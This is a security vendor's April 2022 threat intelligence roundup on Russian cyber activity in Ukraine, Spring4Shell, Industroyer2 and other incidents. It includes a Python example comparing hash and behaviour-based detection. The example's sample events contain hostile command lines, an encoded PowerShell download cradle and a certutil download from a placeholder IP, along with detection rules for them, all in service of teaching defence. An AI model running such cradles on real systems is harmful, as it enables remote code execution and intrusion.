April has been one of our busiest months yet, especially with breaches attributed to Russian threat actors. Unfortunately this is to be expected, with a cyber war running alongside the war in Ukraine. In more positive news, Integrity360 hosted its annual cyber security conference, “Security First”, in London in late April, which I attended myself. I was very impressed with some of the new cyber tech being produced by our partners, such as Cynet and Varonis, not to mention the free merchandise 😉. For a team dedicated to threat hunting and detecting bad in the cyber world, the industry’s move from signature-based detection to AI/behaviour-based detection (which both Cynet and Varonis do) is more than welcome. Standard anti-virus signatures, YARA rules and even Sigma rules are not good enough by themselves, because attackers are increasingly “living off the land”: using the legitimate tools already present on a host (PowerShell, WMI, certutil and the like) rather than dropping a malicious file that a signature could match. The ever-increasing size of organisations’ IT estates makes living off the land even more attractive to attackers: it is the needle-in-a-haystack problem, except that the needle is itself a piece of hay and the haystack keeps growing.
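To make the signature-versus-behaviour point concrete, here is an added example (not code from the original post, and not from Cynet or Varonis) that runs a hash denylist and three simple behavioural rules over constructed Sysmon-style process-creation events. The event records, file hashes, IP address and command lines are all made up for illustration; the rules are simplified versions of logic commonly found in public Sigma rules, not a copy of any particular rule.

```python
"""Signature vs behaviour-based detection over constructed process-creation events.

Added example, not code from the original post. Each event mimics the fields of a
Sysmon Event ID 1 (process creation) record. All hashes, hosts and command lines
are constructed for illustration; the hash values are placeholders, not real hashes.
"""
import base64
import re

# Constructed: a PowerShell download cradle encoded the way attackers pass it to
# -EncodedCommand (UTF-16LE text, then base64).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # Living off the land: Word spawns the legitimate PowerShell binary with a hidden,
    # encoded download cradle. The file hash is the same as any benign PowerShell run.
    {"id": "evt-1", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENCODED}",
     "sha256": "aaaa-legit-powershell"},
    # Classic dropped malware: a file we already have a hash for.
    {"id": "evt-2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\Downloads\invoice.exe",
     "cmdline": "invoice.exe", "sha256": "bbbb-known-bad"},
    # LOLBin abuse: certutil used as a downloader.
    {"id": "evt-3", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/x.bin C:\\Users\\Public\\x.bin",
     "sha256": "cccc-legit-certutil"},
    # Benign admin use of PowerShell with the same hash as evt-1.
    {"id": "evt-4", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents",
     "sha256": "aaaa-legit-powershell"},
]

# Signature layer: a hash denylist (constructed). It can only catch files seen before.
KNOWN_BAD_SHA256 = {"bbbb-known-bad"}


def signature_scan(events):
    """Return the ids of events whose image hash is on the denylist."""
    return [e["id"] for e in events if e["sha256"] in KNOWN_BAD_SHA256]


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Recover the script behind -e/-ec/-enc/-EncodedCommand, or None if absent/undecodable."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_office_spawns_script_host(e):
    """An Office application should not normally start a script interpreter."""
    return _basename(e["parent"]) in OFFICE_APPS and _basename(e["image"]) in SCRIPT_HOSTS


def rule_powershell_download_cradle(e):
    """PowerShell pulling and executing remote content, encoded or not."""
    if _basename(e["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    script = decode_encoded_command(e["cmdline"]) or e["cmdline"]
    return re.search(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", script, re.I) is not None


def rule_certutil_download(e):
    """certutil used to fetch from a URL or decode a dropped payload."""
    return _basename(e["image"]) == "certutil.exe" and re.search(r"-urlcache|-decode", e["cmdline"], re.I) is not None


BEHAVIOUR_RULES = {
    "office_app_spawns_script_host": rule_office_spawns_script_host,
    "powershell_download_cradle": rule_powershell_download_cradle,
    "certutil_download_or_decode": rule_certutil_download,
}


def behaviour_scan(events):
    """Map event id -> names of the behaviour rules that fired (quiet events are omitted)."""
    hits = {}
    for e in events:
        fired = [name for name, rule in BEHAVIOUR_RULES.items() if rule(e)]
        if fired:
            hits[e["id"]] = fired
    return hits


if __name__ == "__main__":
    print("signature hits:", signature_scan(SAMPLE_EVENTS))
    for eid, rules in behaviour_scan(SAMPLE_EVENTS).items():
        print(f"behaviour hit : {eid} -> {rules}")
```

Run stand-alone, the hash denylist flags only evt-2, while the behavioural rules flag evt-1 and evt-3 and stay quiet on evt-4 even though it runs the very same PowerShell binary (same hash) as evt-1. That is the whole argument in miniature: the hash of a living-off-the-land process carries no signal, so the decision has to come from parent/child relationships and command-line content instead.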
In addition to the great partner vendors that attended our conference, we were also joined by Sir Alex Younger (former chief of MI6), who gave a fantastic talk on why intelligence is fundamental to cyber security: a real eye-opener.
Although two months have passed since Russia invaded Ukraine, there has been a distinct lack of publicly known, successful Russian cyber attacks on Ukrainian entities. This has surprised many in the security community: the common assumption before the invasion was that any physical incursion would be accompanied by significant offensive cyber activity. Analysts anticipated Russian attacks aimed at disrupting or destroying core Ukrainian infrastructure, in turn hindering Ukraine’s ability to respond.
There have been some notable Russian cyber operations, mostly involving data-wiping malware intended to destroy files on targeted systems: “CaddyWiper”, “IsaacWiper” and “HermeticWiper” (the last spread by the wormable “HermeticWizard” component) have all been observed targeting systems in Ukraine, alongside a new version of the “Industroyer” malware aimed at electrical substations (covered below). Additionally, researchers reported that US intelligence attributed a cyber-attack on Ukrainian satellite communications systems to Russian military operators. However, these operations do not appear to have been the force multiplier Russia would have wanted.
Three key hypotheses can be drawn from Russia’s apparent lack of significant cyber-victories in Ukraine:
1. Russia did not sufficiently prepare or organise its cyber resources
2. Ukraine adequately prepared itself for the attacks
3. The cyber-security community misjudged the utility and value of offensive cyber operations
However, it is likely that a combination of all three hypotheses explains the lack of Russian success: Russian cyber capabilities have been underused, Ukrainian defences were well prepared, and the security community overvalued cyber warfare in a modern battlespace.
Alongside the absence of successful government-led cyber-attacks, there has also been a distinct lack of cybercrime targeting Ukraine. Although some Russian-language cybercrime groups―such as “Conti” and “CoomingProject” ― have declared support for Russia, no significant increase in high-level cybercrime has been detected affecting Ukrainian entities.
On 04 Apr 2022, VMware released security updates for several of its cloud computing and virtualisation products that are affected by the Spring4Shell remote code execution vulnerability in the Spring Framework (CVE-2022-22965, fixed upstream in Spring Framework 5.3.18 and 5.2.20). The flaw has since reportedly been actively exploited. For product versions without an official patch, VMware has offered workarounds as temporary mitigations. Spring4Shell carries a CVSS score of 9.8 and can be exploited without authentication: an attacker who can reach a vulnerable application can execute arbitrary code and gain control of the underlying system. Note that exploitation in the publicly known form requires JDK 9 or later and a Spring MVC or WebFlux application deployed as a WAR on Apache Tomcat, so check the Java version and deployment model as well as the Spring version when assessing exposure.
On 12 Apr 2022, security researchers identified an attempt by the Russian “Sandworm” advanced persistent threat (APT) group to disrupt a Ukrainian energy provider with a new version of the “Industroyer” (aka CrashOverride) malware, customised to target high-voltage electrical substations. Destructive malware, including “CaddyWiper”, “Orcshred”, “Soloshred” and “Awfulshred”, was then deployed to erase traces of the attack. Additional tooling included the PowerGap PowerShell script and the Impacket Python library, used to download payloads and execute code remotely.
At the end of February 2022, a Ukrainian security researcher leaked more than 60,000 internal messages sent by members of the prolific, Russian-speaking ransomware group “Conti”. The messages provided invaluable insight into the group’s structure and TTPs, although making sense of such a large data set presented challenges.
On 12 Apr 2022, the security team of code hosting platform GitHub launched an investigation after attackers reportedly gained unauthorised access to GitHub’s npm production infrastructure. The unidentified perpetrators allegedly stole and used an Amazon Web Services (AWS) API key, probably with the aim of stealing sensitive and proprietary information.
On 27 Apr 2022, security researchers reported that the People’s Republic of China-associated APT group “Mustang Panda” (aka Bronze President) has targeted Russian military officials with cyber espionage. Using sophisticated malware, the attackers likely intended to enhance intelligence-collection efforts related to Russia. This espionage campaign marks a departure from previously reported Mustang Panda targeting, which typically focused on non-governmental organizations in the US and Europe.
On 05 Mar 2022, security researchers reported that a code signing certificate was among the data stolen and leaked online after a cyber-attack on chip and graphics processing unit (GPU) manufacturer Nvidia. The attack, purportedly conducted by the “Lapsus$” threat group, also exposed more than 70,000 employee email addresses and NT LAN Manager (NTLM) password hashes. Code signing certificates are used to digitally sign and verify code; a stolen certificate lets an attacker sign malware so that it appears to come from a trusted vendor and passes any check that only asks whether the signature is valid. Defenders should treat the leaked certificate as untrusted (for example by blocking it by thumbprint or serial number in their endpoint controls) and should not rely on a valid signature alone as evidence that a binary is benign.
The Integrity360-hosted cyber security conference “Security First” was a success in the UK in April. Looking forward to May, we have the Dublin edition of the conference for our Irish customers. The Irish CTR members are very much looking forward to this, especially as Sir Alex Younger is repeating his talk there too.
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.
Join us in Dublin or London for the Security First 2022 conference. We'll be bringing together industry professionals and specialist experts to discuss the latest cyber security trends and offer actionable advice on preparing your business to put security first in 2022.